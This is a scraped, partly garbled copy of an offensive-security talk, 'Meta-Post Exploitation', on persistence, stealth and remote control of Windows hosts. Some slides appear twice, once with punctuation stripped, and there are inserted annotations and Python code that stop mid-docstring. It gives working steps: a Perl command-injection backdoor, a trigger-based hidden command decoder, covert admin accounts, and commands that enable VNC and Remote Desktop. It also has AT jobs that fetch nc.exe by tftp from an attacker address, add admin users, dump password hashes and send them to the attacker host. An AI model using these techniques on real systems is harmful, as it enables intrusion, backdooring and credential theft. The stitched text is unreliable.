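Rule 3 is the one that survives renaming of tools: it keys on the sequence of account events rather than on any command string, which is why it is kept separate from the per-event rules.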

Slide 63

Massive Automation

Slide 64

Massive Automation

• Automating techniques and tools for use against massive numbers of hosts
• Goals
  – Penetrate as many systems as possible with little interaction and in a short time
  – Ease of use / re-use
  – Lower cost of attack

Slide 65

Massive Automation

• MassNetUse – Establish NetBIOS session credentials on a range of hosts
• MassWinenum – Enumerate NetBIOS information, bypass certain RestrictAnonymous settings
• AtAbuse – Use the scheduler as your "shell" to control ranges of hosts

Slide 66

• DEMOS

Slide 67

• Related talks you should see
  – Beyond EIP – the theoretical tool development end of things (spoonm & skape)
  – Security Implications of Windows Access Tokens (Luke Jennings)

Slide 68

• Acknowledgements
  – Thanks to:
    • All the people from the offensivecomputing, nologin and uninformed IRC and SILC channels
    • HD Moore especially, for support and mentorship
    • Danny Quist, krbklepto, Egypt, spoonm, skape
    • Luke Jennings for his awesome work

Slide 69

• Questions?
• Presentation available at www.offensivecomputing.net

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 17: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 17

Persistence

bull Persistence is maintaining accessbull Why

ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the

targetndash Targetrsquos usefulness not always immediately known

bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter

Slide 18

Persistence

bull Stages of Persistencendash Initial access

bull Exploitbull Stolen password etc

ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent

ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught

bull When you no longer need the target leave no trace

Slide 19

Persistence

bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd

modifications process injection stealing credentials etc

Slide 20

Persistence

bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities

bull Hard to determine maliciousnessbull We all know its hard to find bugs now

imagine someone is purposefully putting the bugs in

Slide 21

Persistence

bull Leveraging existing persistent admin access

bull Nagios checksbull Attack Configuration Management

ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo

them with our trojans)bull GUIrsquos

bull Tool distribution

Slide 22

Persistence

bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version

ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get

detected

Slide 23

Persistence

bull Add vulnerable codebull Example web apps

ndash Take out user input validationndash Inject your vulnerable code

bull Focus on vague intentbull Never be obviously and solely malicious

ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs

Slide 24

Persistence

bull More web app examplesbull Add hidden field to HTML form

ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt

bull Edit web app and tie vuln perl code to form field input

If defined $hidden_field open($filenamerdquogt$hidden_field)

bull Craft a POST including the hidden field

Slide 25

Persistence

bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected

ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period

bull No rootkits to installbull Tripwire probably wonrsquot see this

Slide 26

Persistence

bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form

fieldsndash If Name = John Smith and Age = 42 then execute

contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to

find

Slide 27

Persistence

bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation

Slide 28

Persistence

bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access

bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)

bull Only use AT to run your commandsbull Persistence without adding files new accounts

ndash Unlikely to be discovered

Slide 29

bull DEMOS

Slide 30

Stealth Evading Detection

Slide 31

Stealth Evading Detection

bull Hiding your activityndash From

bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing

Slide 32

Stealth Evading Detection

bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you

can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist

(helps persistence)ndash On a pen test you should also be testing the

organizations detection and response capabilities

Slide 33

Stealth Evading Detection

bull Goalsndash Keep system operable

bull If it breaks you canrsquot use itbull Someone will come fix it

ndash Operate without fear of detectionndash Robustness

bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS

Slide 34

Stealth Evading Detection

bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption

bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics

bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research

Slide 35

Stealth Evading Detection

bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight

bull Many tools have ONLY malicious usesbull Make your intent hard to determine

ndash Be noisy on one to divert attention from another

Slide 36

Stealth Evading Detection

bull Different Perspectivendash Know the targets environment better than

they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal

behavior

ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious

Slide 37

Stealth Evading Detection

bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs

Slide 38

bull DEMOSndash Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

bull Itrsquos not always about ROOTbull Look like someone else

ndash Use the credentials access of another userbull Goals

ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior

Slide 41

User Identity Theft

bull Stages and techniquesndash Target users

bull Who has access to whatbull Where is the data

ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens

ndash Access is the end goal be it data or another system

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 51

Feature Modification bull Enabling VNC (from command line)

ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder

bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll

ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo

Vncreg file contents

[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8

Slide 52

Feature Modification

bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app

bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI

bull SCADA systemsbull Security camerasbull Who knows what you might be up to

ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO

Slide 53

Feature Modification bull Enabling Remote Desktop remotely

ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini

[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =

ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account

Slide 54

Feature Modification bull Enabling Remote Desktop remotely

ndash Create another file named enable_tsregWindows Registry Editor Version 500

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]

fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000

ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services

Slide 55

bull DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 59

Abusing The Scheduler

bull Often AT is still enabled while many other things you typically use are not

bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

bull Building a tool around AT ndash Flow

bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now

ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not

always ldquoquietrdquo or available

Slide 61

Abusing The Scheduler

bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does

bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)

bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host

Slide 62

Abusing The Scheduler

bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and

BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

bull Automating techniques and tools for use against massive numbers of hosts

bull Goalsndash Penetrate as many systems as possible

with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 18: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 18

Persistence

• Stages of Persistence
– Initial access
• Exploit
• Stolen password, etc.
– Decisions: What tool to use?
• FUZZY – OS, environment and target dependent
– Setup – Re-accessing the target
– Cleanup: Don't be a slob, it will get you caught
• When you no longer need the target, leave no trace

Slide 19

Persistence

• Existing tools
– Rootkits
– Backdoors
– Trojans
– Port knockers
– Adding accounts
– Things like netcat backdoors, inetd modifications, process injection, stealing credentials, etc.

Slide 20

Persistence

• Different perspective on persistence
– If you can always re-exploit, who cares?
– Inject, add or modify new vulnerabilities
• Hard to determine maliciousness
• We all know it's hard to find bugs now; imagine someone is purposefully putting the bugs in

Slide 21

Persistence

• Leveraging existing persistent admin access
• Nagios checks
• Attack Configuration Management
– Cfengine
– SMS (Microsoft Systems Management Server)
– Automated patching systems ("patch" them with our trojans)
• GUIs
• Tool distribution

Slide 22

Persistence

• Example
• Machine has VNC installed
• Replace installed VNC with a vulnerable version
– Authentication bypass
• Copy the registry password so the target doesn't realize
• Persistence with no backdoors or rootkits to get detected

Slide 23

Persistence

• Add vulnerable code
• Example: web apps
– Take out user input validation
– Inject your vulnerable code
• Focus on vague intent
• Never be obviously and solely malicious
– Look for apps with previous vulnerabilities
– Re-introduce patched bugs

Slide 24

Persistence

• More web app examples
• Add a hidden field to an HTML form
– Users detect no change, app performs normally:
  <input type="hidden" name="Lang">
• Edit the web app and tie vulnerable Perl code to the form field input:
  if (defined $hidden_field) { open($filename, ">$hidden_field"); }
  (Perl's two-argument open treats a value that starts or ends with | as a command to pipe to or from, which is what the next slide relies on.)
• Craft a POST including the hidden field

Slide 25

Persistence

• www.target.com/cgi-bin/app.cgi?lang=|cmd|
• Code will execute your commands
• Who needs to bind a shell to a port?
• Unlikely to ever be detected
– Especially good in big apps
– Code review can't even be sure of maliciousness
– Some sites replace code every X time period
• No rootkits to install
• Tripwire probably won't see this

Slide 26

Persistence

• Take the concept to another level
– Add a decoder to the web app
– Look for a "trigger" string combination in form fields
– If Name = John Smith and Age = 42, then execute the contents of the Address field
– URL-encode form entries containing commands
– Have an identifier "stub" in the encoded data for the app to find

Slide 27

Persistence

• Mixing Stealth with Persistence
– Further encoding
– Take entries from all fields
– Concatenate them
– "Decode" commands
– Rotational ciphers (rot13, Caesar)
– Even more complex obfuscation
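The trigger-and-stub decoder that slides 24 to 27 describe, written out as an added example (this is not code from the talk or from Offensive Computing). It models the backdoored app's side of the check: the form behaves normally unless the assumed trigger fields match, in which case every field value is concatenated, a stub marker locates the payload, and URL-decoding plus rot13 recover the command. The field names, the stub value and the sample POST bodies are constructed here; the function only returns the recovered command and never executes it.

```python
"""Trigger-and-stub form decoder (added example, not from the talk).

Models the covert channel from the Persistence slides: the form still works
normally, but when name == "John Smith" and age == "42" the app looks through
every submitted field for a payload bracketed by a marker ("stub"), URL-decodes
it and undoes a rotational cipher (rot13) to recover a command.  This code only
*returns* the recovered command; nothing is executed.
"""
import codecs
from urllib.parse import parse_qs, quote, unquote

TRIGGER = {"name": "John Smith", "age": "42"}   # assumed trigger fields/values
STUB = "zz9"                                      # assumed marker bracketing the payload


def encode_payload(command):
    """Sender side: rot13 the command, URL-encode it, bracket it with the stub.

    The result is what goes into an otherwise ordinary form field.  It is
    URL-encoded a second time when the browser builds the request body, so the
    web server's normal decoding leaves this inner layer intact.
    """
    return STUB + quote(codecs.encode(command, "rot13")) + STUB


def extract_command(form):
    """Backdoored-app side.

    form: dict of field name -> value, as the app sees it after the server has
    URL-decoded the request body.  Returns the recovered command string when
    (a) every trigger field matches exactly and (b) a stub-delimited payload is
    present in the concatenation of all field values; otherwise None, meaning
    the app should just process the form normally.
    """
    if any(form.get(k) != v for k, v in TRIGGER.items()):
        return None
    # Slide 27: take entries from all fields and concatenate them, so the payload
    # can live in any field (or be split across several).
    blob = "".join(form[k] for k in sorted(form))
    start = blob.find(STUB)
    if start < 0:
        return None
    end = blob.find(STUB, start + len(STUB))
    if end < 0:
        return None
    inner = blob[start + len(STUB):end]
    return codecs.decode(unquote(inner), "rot13")


def extract_from_body(body):
    """Same check applied to a raw application/x-www-form-urlencoded POST body."""
    form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    return extract_command(form)


# Constructed sample request bodies (not captured traffic).
BENIGN_BODY = "name=John+Smith&age=42&address=1+Main+St"
TRIGGERED_BODY = "name=John+Smith&age=42&address=" + quote(encode_payload("cat /etc/passwd"))
WRONG_TRIGGER_BODY = "name=Jane+Doe&age=42&address=" + quote(encode_payload("cat /etc/passwd"))

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY),
                        ("triggered", TRIGGERED_BODY),
                        ("wrong trigger", WRONG_TRIGGER_BODY)):
        print(label, "->", extract_from_body(body))
```

The point the code makes is the detection problem from slide 25: nothing in a single field looks like a command, the trigger values are plausible user data, and a code reviewer sees only a small parsing routine with no obviously malicious intent.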

Slide 28

Persistence

• Covert Accounts
– Add an account, or re-enable one
– Modify local account policies to allow access
• Ex: SUPPORT_3848576b1, guest
– Add it to the admin group (net localgroup)
• Only use AT to run your commands
• Persistence without adding files or new accounts
– Unlikely to be discovered

Slide 29

• DEMOS

Slide 30

Stealth / Evading Detection

Slide 31

Stealth / Evading Detection

• Hiding your activity
– From:
• IDS
• AV
• Logging
• Suspicious users & admins
• Firewalls
• Process listing

Slide 32

Stealth / Evading Detection

• Why Stealth?
– If you get caught, you get stopped
– The longer you can operate undetected, the more you can accomplish
– Admins won't fix problems they don't know exist (helps persistence)
– On a pen test you should also be testing the organization's detection and response capabilities

Slide 33

Stealth / Evading Detection

• Goals
– Keep the system operable
• If it breaks you can't use it
• Someone will come fix it
– Operate without fear of detection
– Robustness
• Hiding shouldn't require constant attention
– DON'T LOOK MALICIOUS

Slide 34

Stealth / Evading Detection

• Manual / Existing Tools
– Rootkits, rootkits, rootkits
– Meterpreter
– Encryption
• Shellcode encoders for IDS evasion
– Log cleaners
– Packers
– Covert channels, steganography
– Anti-analysis, anti-forensics
• See all of OC's other talks
• Also Vinnie Liu's Metasploit research

Slide 35

Stealth / Evading Detection

• Different Perspective
– DON'T BE AN ANOMALY
– Hide in plain sight
• Many tools have ONLY malicious uses
• Make your intent hard to determine
– Be noisy on one thing to divert attention from another

Slide 36

Stealth / Evading Detection

• Different Perspective
– Know the target's environment better than they do
• If they don't use encryption, maybe you shouldn't either
• Change strategies to match the environment's normal behavior
– Don't always default to exploits
• See the Tactical Exploitation talk
• IDSs can't see normal behavior that is malicious

Slide 37

Stealth / Evading Detection

• Using Windows security objects for stealth
– Auditing of securable objects is controlled by SACLs
– Null SACL = No Auditing = No Logs
– Scope: a SACL only governs object-access auditing for that one object; logon, process-tracking and policy-change auditing are configured elsewhere. Writing a SACL requires ACCESS_SYSTEM_SECURITY, which comes with SeSecurityPrivilege (held by Administrators and SYSTEM).

Slide 38

• DEMOS
– Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

• It's not always about ROOT
• Look like someone else
– Use the credentials / access of another user
• Goals
– Change your identity at will
• User ID, domain credentials, sessions
• Impersonate system accounts
• Make activities look like normal user behavior

Slide 41

User Identity Theft

• Stages and techniques
– Target users
• Who has access to what?
• Where is the data?
– Change identity
• Hijack credentials / sessions
• Abuse tokens
– Access is the end goal, be it data or another system

Slide 42

User Identity Theft

• Existing tools
– Incognito (Metasploit)
• Enumerate / hijack tokens
– FU / FUTo
• Enable SYSTEM privileges
• Change process privileges, DKOM
– su, sudo, ksu
– Process injection
– Hijack domain credentials

Slide 43

User Identity Theft

Tokens, Privileges, Security Descriptors, SIDs, SACLs, DACLs, ACEs... Oh My!

• What we want
– Privileges or SIDs
• What we get
– Access, Access, Access
• How we get it
– Incognito vs. FUTo

Slide 44

• DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

• Changing existing features or settings to benefit our activities
• Goals
– Support all post-exploitation activities
– Disabling detection technologies
– Enabling insecure or easy-to-use access software

Slide 47

Feature Modification

• Feature Modification is basically Securable Object Manipulation
– Remember all those Tokens and Security Descriptors?
– These can be modified programmatically and directly
• Not just through existing tools
– Stealth / persistence requirements
• May make it more advantageous to use custom tools
– Access objects programmatically
– Can be much more complex to implement

Slide 48

Feature Modification

• Re-enabling disabled access
– PsExec: It's still cool (Thanks Mark)
• Enabling GUI access
– VNC (from a command line)
– Remote Desktop (even if disabled)
• Turning off, or adding exceptions to, security software
– Firewalls, AV, logging
• Modifying Local Security Policies

Slide 49

Feature Modification

• Enabling psexec
– Psexec was a great, awesome remote shell / command tool
– Everybody now disables ClipBook, which psexec requires (l4m3)
– Let's re-enable it

Slide 50

Feature Modification

• Enabling psexec
• Use the service control tool, sc.exe
– net use \\target\ipc$ userpassword /user:username
– sc \\target config netdde start= auto
– sc \\target config netddedsdm start= auto
– sc \\target config clipsrv start= auto
– sc \\target start netdde
– sc \\target start netddedsdm
– sc \\target start clipsrv
– Note: the space after start= is required by sc. NetDDE and ClipBook are XP/2003-era services; they were removed in Vista.

Slide 51

Feature Modification

• Enabling VNC (from the command line)
– Go get VNC (check out guhnu)
– Make a folder on the target for the VNC files
– Copy the following files to the target folder:
• winvnc.exe
• vnc.reg
• vnchooks.dll
• omnithread_rt.dll
– regedit /s vnc.reg
– winvnc -install
– net start "vnc server"
– winvnc
– Password is "infected"

vnc.reg file contents:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
"SocketConnect"=dword:00000001
"AutoPortSelect"=dword:00000001
"InputsEnabled"=dword:00000001
"LocalInputsDisabled"=dword:00000000
"IdleTimeout"=dword:00000000
"QuerySetting"=dword:00000002
"QueryTimeout"=dword:0000000a
"PollUnderCursor"=dword:00000000
"PollForeground"=dword:00000001
"PollFullScreen"=dword:00000000
"OnlyPollConsole"=dword:00000001
"OnlyPollOnEvent"=dword:00000000
"Password"=hex:10,4d,89,3d,5a,e1,55,f8

The Password value is the 8-byte form WinVNC stores: the password obfuscated with DES under a fixed, published key, not a hash. It can therefore be copied between hosts or decoded without knowing the plaintext, which is what the "copy the registry password" step on slide 22 relies on.

Slide 52

Feature Modification

• Enabling Remote Desktop remotely
– Having a GUI to your target can be necessary
– Maybe they are running a specialized GUI app
• Ex: System controlling access to security doors
– No command-line way of modifying the system, need a GUI
• SCADA systems
• Security cameras
• Who knows what you might be up to
– Remote Desktop is fast and already a feature of the OS
– However, it's often disabled, maybe even by GPO

Slide 53

Feature Modification

• Enabling Remote Desktop remotely
– Complicated procedure, especially if GPOs are involved
– Create a file named fix_ts_policy.ini:

[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
SeRemoteInteractiveLogonRight = hacked_account
SeInteractiveLogonRight = hacked_account
SeDenyInteractiveLogonRight =
SeDenyRemoteInteractiveLogonRight =
SeDenyNetworkLogonRight =

– This file will fix the policy settings that are in your way
– Change "hacked_account" to a real account
– Caveat: a [Privilege Rights] entry replaces the whole assignment rather than adding to it, so as written only hacked_account keeps SeInteractiveLogonRight; list the existing holders alongside it (e.g. *S-1-5-32-544 for Administrators) or you break local logons and get noticed. Settings that come from a domain GPO override local policy again on the next policy refresh.

Slide 54

Feature Modification

• Enabling Remote Desktop remotely
– Create another file named enable_ts.reg:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000

– Then perform these commands:
• sc config termservice start= auto
• regedit /s enable_ts.reg
• copy c:\windows\security\database\secedit.sdb c:\windows\security\database\newsecedit.sdb
• copy c:\windows\security\database\secedit.sdb c:\windows\security\database\origsecedit.sdb
• secedit /configure /db c:\windows\security\database\newsecedit.sdb /cfg fix_ts_policy.ini
• gpupdate /force
• net start "terminal services"

Slide 55

• DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

• Oldschool techniques can get results on new problems
• Remember, this is POST exploitation, so you already have some access
• The AT command schedules things to run at a specified time and date
– The Schedule service must be running

Slide 58

Abusing The Scheduler

• Often these days certain features are disabled for security
– ClipBook, shares, enumeration
• Use AT to get around these problems
– Usually NOT disabled

net use \\target\ipc$ password /user:username
at \\target 12:00 command
Ex: at \\192.168.1.1 12:00 tftp -i myip GET nc.exe

(AT takes the time as HH:MM in 24-hour notation, on the target's clock.)

Slide 59

Abusing The Scheduler

• Often AT is still enabled while many other things you typically use are not
• AT is as good as having a shell
– Enable / start services
– Transfer files
– Adding users
– Messing with the registry, policies
– Pretty much anything you can do with a shell
– Added bonus: defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

• Building a tool around AT – Flow
• Establish an authenticated session
• Determine the time on the target
• Pass commands to the target to be run 1 min from now
– Write a batch file that executes everything at once
– Have the target send you back whatever info you want
– Be mindful of file transfer protocols; TFTP is good but not always "quiet" or available

Slide 61

Abusing The Scheduler

• Common use example
– net use \\target ...
– net time \\target
– at \\target (net time + 1 min) "tftp -i <attacker ip> GET e.bat"
– at \\target (net time + 2 min) e.bat
– e.bat does:
• Adds a user (net user hacked hacked /add)
– Admin group (net localgroup administrators hacked /add)
• Gets hash-dumping tools and dumps hashes
• Sends hashes, identified by IP, back to the attacker host
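The time-handling part of the AT flow from slides 58 to 61 (and of the AtAbuse idea from the Massive Automation slides), as an added example rather than one of the talk's own tools. AT takes a wall-clock time on the target, so the helper parses the target's clock from `net time` output and schedules relative to that, rolling correctly over midnight, and refuses to schedule from output it cannot parse. The `net time` format assumed is the US-locale one, and the attacker address and the payload name e.bat are placeholders; the functions only build command strings, nothing is run.

```python
"""AT-scheduling helper (added example, not one of the talk's tools).

Flow from the 'Abusing The Scheduler' slides: net use -> net time \\target ->
at \\target HH:MM "cmd".  AT schedules against the *target's* clock, so the
time comes from `net time`, never from the attacker's own clock.  Assumptions
not taken from the talk: US-locale `net time` output, attacker 10.0.0.5, e.bat.
"""
import re
from datetime import datetime, timedelta

# Constructed sample of `net time \\TARGET` output (US locale), near midnight.
SAMPLE_NET_TIME = (
    "Current time at \\\\TARGET is 5/12/2008 11:59 PM\r\n"
    "\r\n"
    "The command completed successfully.\r\n"
)

_NET_TIME_RE = re.compile(
    r"Current time at \\\\(?P<host>\S+) is "
    r"(?P<stamp>\d{1,2}/\d{1,2}/\d{4} \d{1,2}:\d{2} [AP]M)"
)


def parse_net_time(output):
    """Return (host, datetime) parsed from `net time \\host` output.

    Raises ValueError on anything else, so a locale mismatch or an
    'access denied' message is not silently turned into a bogus schedule.
    """
    m = _NET_TIME_RE.search(output)
    if m is None:
        raise ValueError("unrecognised `net time` output: %r" % output[:60])
    return m.group("host"), datetime.strptime(m.group("stamp"), "%m/%d/%Y %I:%M %p")


def at_clock(target_now, minutes_ahead):
    """Time string in the 24-hour HH:MM form AT accepts, rolling over midnight.

    `net time` only has minute resolution, so the real lead is anywhere between
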